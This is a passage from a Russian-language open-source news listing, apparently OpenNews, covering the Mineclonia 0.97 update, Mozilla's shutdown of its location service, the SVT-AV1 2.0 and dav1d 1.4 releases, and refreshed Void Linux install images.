  4. OpenNews: Первый выпуск композитного сервера Niri, использующего Wayland
  5. OpenNews: Выпуск среды рабочего стола Regolith 3.1
  6. OpenNews: Сотрудник Canonical представил miracle-wm, композитный менеджер на базе Wayland и Mir
Обсуждение (97 +11) | Автор: Sunderland93 | Тип: Программы |


·15.03 Обновление игры Mineclonia 0.97, сделанной на движке Minetest (53 +15)
  Вышло обновление 0.97 игры Mineclonia, которая является форком Mineclone2 и сделана на движке Minetest. Отличительной чертой Mineclonia по сравнению с Mineclone2 является упор на стабильность и производительность многопользовательской игры. На данный момент игра имеет больше функций, чем Mineclone2, но при этом из Mineclonia намеренно удалены внутриигровая музыка (для сокращения размера) и "гамбургеры", которые отсутствуют в Minecraft и негативно влияли на производительность. Код проекта написан на языке Lua и распространяется под лицензией GPLv3.

Среди изменений в новой версии можно отметить добавление стоимости уровня на наковальне, реализация удочки и добавление возможности ловить рыбу, а также исправление некоторых ошибок.

  1. Главная ссылка к новости
  2. OpenNews: Обновление Nodeverse, игры об исследовании космоса на движке Minetest
  3. OpenNews: Релиз свободного воксельного игрового движка Minetest 5.8.0
  4. OpenNews: Обновление Repixture 3.11.0, игры на движке Minetest
  5. OpenNews: Обновление Steampunk Blimp и 3d_armor, модов к minetest
Обсуждение (53 +15) | Автор: Аноним | Тип: Программы |


·15.03 Mozilla закрывает общедоступный сервис определения местоположения (50 –2)
  Компания Mozilla объявила о решении по закрытию проекта MLS (Mozilla Location Service), c 2013 года развивавшего общедоступный сервис для определения географического местоположения на основании информации об известных точках доступа Wi-Fi (привязка к BSSID/MAC), базовых станциях мобильных операторов (привязка к Cell-ID) и выдаваемых абоненту IP-адресах (GeoIP). Сервис позволял определять примерное местоположение на карте без применения спутниковых систем навигации, таких как GPS и ГЛОНАС.

С 2019 года возможности сервиса были ограничены из-за обвинений в нарушении патентов компании Skyhook Holdings и заключения внесудебного соглашения, в соответствии с которым компания Mozilla установила лимит в 100 тысяч обращений к API в день для коммерческих проектов. Введённые ограничения привели к отказу проекта Sailfish от использования MLS и потере инвестиционной привлекательности MLS в глазах Mozilla. При этом MLS продолжал применяться в проекте microG и во многих альтернативных Android-прошивках вместо проприетарного сервиса Google Network Location.

В качестве причины сворачивания проекта упоминается продолжающаяся тенденция к снижению точности определения местоположения в MLS в сочетании с отсутствием желания увеличить инвестиции или возродить программу MozStumbler. База данных с привязкой координат к базовым станциям и Wi-Fi-сетям пополнялась благодаря действиям энтузиастов, установивших на свои смартфоны мобильное приложение MozStumbler. Приложение MozStumbler было привязано к сервису stumbler, который входил в состав старого Firefox для Android вплоть до версии 69, на смену которому в 2020 году пришла новая мобильная редакция браузера, развиваемая под кодовым именем Fenix.

В начале 2021 года разработка MozStumbler была остановлена и приложение так и не было адаптировано для Android 10 и более новых версий платформы. Несмотря на наличие альтернативных приложений, таких как TowerCollector, в настоящее время поступление новых данных в БД MLS существенно снизилось и актуальность информации оставляет желать лучшего. Из альтернативных открытых БД с данными о привязке местоположения можно отметить OpenCellID.

Предложен следующий план постепенного отключения сервиса:

  • Начиная с 13 марта прекращена выдача новых ключей доступа к API.
  • 27 марта будет прекращён приём POST-запросов данных через API, а также будет остановлена публикация новых дампов БД для экспорта в другие системы.
  • 10 апреля все ранее опубликованные дампы БД будут удалены и перестанут быть доступны для загрузки.
  • 12 июня будут удалены все ключи доступа к API, кроме ключей, используемых в проектах Mozilla.
  • 31 июля репозиторий с кодом платформы будет переведён на GitHub в архивных режим. Для тех, кто пожелает возродить сервис и поддерживать его собственными силами, исходный код платформы Mozilla Ichnaea, лежащей в основе MLS, останется доступен под лицензией Apache License 2.0.

  1. Главная ссылка к новости
  2. OpenNews: Mozilla развивает собственный сервис для определения местоположения
  3. OpenNews: Выпуск Android-прошивки CalyxOS 2.8.0, не привязанной к сервисам Google
  4. OpenNews: Проект microG выпустил сборку LineageOS с альтернативной реализацией сервисов Google
  5. OpenNews: Представлен gps-share, инструмент для организации совместного доступа к GPS
  6. OpenNews: Выпуск GeoClue 2.3.0, фреймворка для определения местоположения
Обсуждение (50 –2) | Тип: К сведению | Интересно


·15.03 Выпуск кодировщика SVT-AV1 2.0 и декодировщика dav1d 1.4 для формата видео AV1 (117 +26)
  Опубликован выпуск библиотеки SVT-AV1 2.0 (Scalable Video Technology AV1) c реализациями кодировщика и декодировщика формата кодирования видео AV1, для ускорения которых задействованы присутствующие в современных CPU Intel средства аппаратного распараллеливания вычислений. Проект создан компанией Intel в партнёрстве с Netflix с целью достижения уровня производительности, пригодного для перекодирования видео на лету и применения в сервисах, отдающих видео по запросу (VOD). В настоящее время разработка ведётся под эгидой альянса Open Media (AOMedia), курирующего развитие формата кодирования видео AV1. Ранее проект развивался в рамках проекта OpenVisualCloud, который также разрабатывает кодировщики SVT-HEVC и SVT-VP9. Код распространяется под лицензией BSD.

SVT-AV1 может быть собран для систем на базе любых архитектур, для которых имеется компилятор с поддержкой стандарта C99, но наилучшая производительность достигается на системах x86_64, для которых применяются ассемблерные оптимизации на базе инструкций SIMD (желательно наличие в CPU поддержки AVX2, но в качестве минимума достаточно и SS2). Потребление памяти зависит от числа задействованных при кодировании процессорных ядер, регулируемых опцией "--lp". Из-за усложнения применяемых в AV1 алгоритмов, для кодирования данного формата требуется существенно больше ресурсов, чем для других форматов, например, штатный кодировщик от проекта AV1 требует в 5721, 5869 и 658 раз больше вычислений по сравнению с кодировщиками x264 (профиль "main"), x264 (профиль "high") и libvpx-vp9.

Среди изменений в новом выпуске SVT-AV1:

  • Осуществлён переход на новую нумерацию версий, в соответствии с которой первая цифра в версии будет меняться при каждом изменении API/ABI.
  • Внесены изменения в API, связанные с переходом к индикации завершения потока (EOS - End Of Stream) в последнем кадре вместо использования пустого кадра, что позволило исключить задержку на ожидание лишнего кадра. Изменение API уже отражено в кодовой базе FFmpeg.
  • Удалён трёхпроходный режим переменного битрейта (3-pass VBR), вместо которого теперь используется механизм многопроходного VBR. Многопроходный режим VBR сведён к выполнению двух проходов для обеспечения интеграции с FFmpeg.
  • В кодировщик добавлены оптимизации, в результате которых эффективность сжатия пресетов M9-M13 повысилась на 1-4%, а потребление памяти в пресете M5 снизилась на 20-35% в режиме LP 8 и на 1-5% в других режимах. Потребление памяти в остальных пресетах уменьшилось на 1-5%.
  • Проведена оптимизация компромиссов качество/скорость для пресетов, выставляющих высокий уровень качества. Работа пресета MR, предоставляющего эталонное качество, ускорена на 100%.
  • В функции, написанные только на языке Си, добавлены оптимизации, специфичные для архитектуры ARM.

Дополнительно можно отметить выпуск проекта dav1d 1.4.1, в рамках которого сообщества VideoLAN и FFmpeg развивают библиотеку с реализацией альтернативного свободного декодировщика формата кодирования видео AV1. Библиотека dav1d поддерживает все возможности AV1, включая расширенные виды субдискретизации и все заявленные в спецификации параметры управления глубиной цвета (8, 10 и 12 бит). Ключевой особенностью dav1d является ориентация на достижение максимально возможной производительности декодирования и обеспечение качественной работы в многопоточном режиме. Код проекта написан на языке C (C99) с ассемблерными вставками (NASM/GAS) и распространяется под лицензией BSD. Реализована поддержка архитектур x86, x86_64, ARMv7 и ARMv8, и операционных систем FreeBSD, Linux, Windows, macOS, Android и iOS.

Версия dav1d 1.4 примечательна поддержкой новых архитектур Loongarch и RISC-V, а также задействованием дополнительных оптимизаций на базе инструкций AVX-512, ускорением работы фильтров 6tap на системах ARM, повышением эффективности многопоточной работы и сокращением размера бинарных данных на системах ARM64, ARM32 и RISC-V. Устранена уязвимость CVE-2024-1580, приводившая к записи в область вне границ буфера из-за целочисленного переполнения при обработке кадров очень большого размера.

  1. Главная ссылка к новости
  2. OpenNews: Опубликованы libavif 1.0 и SVT-AV1 1.7, библиотеки для форматов изображений AVIF и видео AV1
  3. OpenNews: Intel открыл кодировщик видео AV1, оптимизированный для перекодирования на лету
  4. OpenNews: Выпуск rav1e 0.5, кодировщика AV1
  5. OpenNews: Разработчики кодека AV1 представили формат IAMF для объёмного звука
Обсуждение (117 +26) | Тип: Программы |


·15.03 Обновление установочных сборок Void Linux (41 +5)
  Сформированы новые загрузочные сборки дистрибутива Void Linux, который является самостоятельным проектом, не использующим наработки других дистрибутивов и разрабатываемый с применением непрерывного цикла обновления версий программ (rolling-обновления, без отдельных релизов дистрибутива). Прошлые сборки были опубликованы год назад. Кроме появления актуальных загрузочных образов на основе более свежего среза системы обновление сборок функциональных изменений не несёт и их использование имеет смысл только для новых установок (в уже установленных системах обновления пакетов доставляются по мере готовности).

Сборки доступны в вариантах на базе системных библиотек Glibc и Musl. Для платформ x86_64, i686, armv6l, armv7l и aarch64 подготовлены Live-образы с рабочим столом Xfce и базовая консольная сборка. В сборках для ARM поддерживаются платы BeagleBone/BeagleBone Black, Cubieboard 2, Odroid U2/U3 и Raspberry Pi.

Дистрибутив применяет для инициализации и управления сервисами системный менеджер runit. Для управления пакетами развивается собственный пакетный менеджер xbps и система сборки пакетов xbps-src. Xbps позволяет устанавливать, удалять и обновлять приложения, выявлять несовместимость разделяемых библиотек и управлять зависимостями. В качестве стандартной библиотеки вместо Glibc есть возможность использовать Musl. Развиваемые в Void системы распространяются под лицензией BSD.

Среди изменений в новых сборках:

  • Обновлены версии пакетов.
  • В сборках с пользовательским окружением Xfce на экране входа в систему, в котором используется дисплейный менеджер LightDM, обеспечен показ виджета для выбора раскладки клавиатуры.
  • В Live-сборках по умолчанию включён фоновый процесс для синхронизации точного времени, реализованный на базе NTP-сервера Сhrony.
  • Для плат Raspberry Pi, поддерживающих загрузку с USB-накопителей, предоставлена возможность установки на накопители, отличные от SD-карт.
  • В сборках для плат Raspberry Pi размер раздела /boot по умолчанию увеличен с 64 до 256 МБ.
  • В сборки rpi-aarch64* добавлена поддержка платы Raspberry Pi 5 (после установки рекомендуется установить пакет rpi5-kernel с версией ядра Linux, оптимизированной для плат Raspberry Pi).

  1. Главная ссылка к новости
  2. OpenNews: Дистрибутив Trident переходит с BSD-системы TrueOS на Void Linux
  3. OpenNews: Прекращение разработки дистрибутива Trident, два года назад перешедшего с TrueOS на Void Linux
  4. OpenNews: Void Linux возвращается с LibreSSL на OpenSSL
  5. OpenNews: Основатель Void Linux убрал ограничение на использование своих разработок
  6. OpenNews: Основатель Void Linux со скандалом покинул проект и был заблокирован на GitHub
Обсуждение (41 +5) | Тип: Программы |


Следующая страница (раньше) >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру